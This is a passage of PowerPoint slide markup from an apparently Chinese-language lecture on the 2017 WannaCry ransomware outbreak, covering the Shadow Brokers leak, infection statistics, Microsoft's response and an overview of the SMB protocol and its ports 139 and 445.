              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>月 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>14 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>日晚，“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Shadow Brokers” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>终于忍不住了，在推特上放出了他们当时保留的部分文件，解压密码是 “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>Reeeeeeeeeeeeeee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>这次的文件有三个目录，分别为“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Swift” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>和 “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>OddJob</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，包含一堆令人震撼的黑客工具，其中包括</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="63745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一、背景故事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524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	2017</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>月</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>12</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>日，全球多国爆发电脑勒索病毒，受害者电脑会被黑客锁定，提示支付价值相当于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>300</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>美元（约合人民币</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>2069</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>元）的比特币才可解锁。目前已经波及多个国家。针对这一事件，微软方面率先作出回应，宣称增加措施对抗这一病毒。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>微软宣称，该公司的工程师已经增加了检测与保护措施，来对抗这种一度毁坏英国医院并损害全球其他数十个国家与地区的电脑的勒索病毒。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>微软公司发言人通过声明称，“今天，我们的工程师加强了检测与保护措施来对抗这种名为‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Ransom:Win32.WannaCrypt’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>勒索病毒。”除此之外，微软方面还表示，该公司将与客户合作，在对抗勒索病毒方面为用户提供更多支持。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>月</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>13</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>日晚上开始，国内多所大学学生反馈称电脑遭遇了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>勒索病毒攻击，攻击者以中文弹窗的形式要求电脑所有者支付比特币解锁，如下图。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="https://images2018.cnblogs.com/blog/1225709/201805/1225709-20180528113416487-1656784003.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B826E7FA-918E-4120-A1AA-3F07D3843C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2668" y="1490721"/>
            <a:ext cx="7313522" cy="4760790"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21330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一、背景故事</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994187"/>
            <a:ext cx="11827702" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>在过去的十几个小时当中全球共计有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>74</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>个国家，至少</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>4.5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>万台电脑中招，本次爆发的病毒共计可谓是近年来影响最大的一次病毒袭击事件，由于临近大学毕业，有大学受害者称论文文件也遭到加密。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>据路透社报道，针对此次产生的大范围病毒袭击，微软在周五表示工程师已经增加了检测与保护措施，以防止在世界上数十个国家以及在英国医院出现的勒索软件攻击。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>微软发言人在声明当中表示，微软工程师已经为新出现的恶意软件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>Rensom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>添加了检测与保护：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Win32.WannaCrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>。发言人表示，该公司正在与客户合作提供额外的帮助。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>另外对于国内用户来说，由于此前国内已经爆发过多次利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>445</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>端口传播的蠕虫，运营商对个人用户已经封掉</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>445</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>端口避免出现此类问题，但是由于教育网没有此限制，因此此次受影响范围严重。据有关机构统计，目前国内平均每天有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>5000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>多台机器遭到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>NSA“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>永恒之蓝”黑客武器的远程攻击，教育网是受攻击的重灾区。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="802277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82149" y="1964353"/>
            <a:ext cx="11827702" cy="4893647"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>概述</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>ServerMessage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> Block</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）通信协议是微软（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）和英特尔</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(Intel)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>1987</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>年制定的协议，主要是作为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>网络的通讯协议。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SMB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>是在会话层（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>session layer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）和表示层（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>presentation layer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）以及小部分应用层（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>application layer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）的协议。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>使用了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>NetBIOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的应用程序接口 （</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Application Program Interface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，简称</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>），一般端口使用为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>139</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>445</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>。另外，它是一个开放性的协议，允许了协议扩展</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>使得它变得更大而且复杂；大约有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>65</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>个最上层的作业，而每个作业都超过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>120</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>个函数，甚至</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows NT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>也没有全部支持到，最近微软又把 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SMB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>改名为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>CIFS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>CommonInternet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> File System</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>），并且加入了许多新的特色。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>协议是一个很重要的协议，目前绝大多数的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>PC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>上都在运行这一协议，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>系统都充当着</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>协议的客户端和服务器，所以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>是一个遵循客户机服务器模式的协议。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>服务器负责通过网络提供可用的共享资源给</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>客户机，服务器和客户机之间通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>协议、或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>IPX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>协议、或者是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>NetBEUI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>进行连接。</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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1154736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43339" y="3242647"/>
            <a:ext cx="11827702" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>是应用层（和表示层）协议，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>C/S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>架构，其工作的端口与其使用的协议有关。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>当远程连接计算机访问共享资源时有两种方式： </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>★共享计算机地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>共</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>享资源路径</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>★共享计算机名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>共享资源路径</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>其中，使用计算机名访问时，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>服务工作在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>NetBIOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>协议之上，用的是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>139</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>端口；使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>地址访问时，用的是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>445</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>端口。</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5" name="图片 4" descr="http://www.poluoluo.com/server/UploadFiles_7037/200809/2008092713093663.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7EF44E4-AEED-4A52-AC0A-7F29D3ADB5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74665" y="290415"/>
            <a:ext cx="7206045" cy="2952232"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="136066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43339" y="2008805"/>
            <a:ext cx="11827702" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
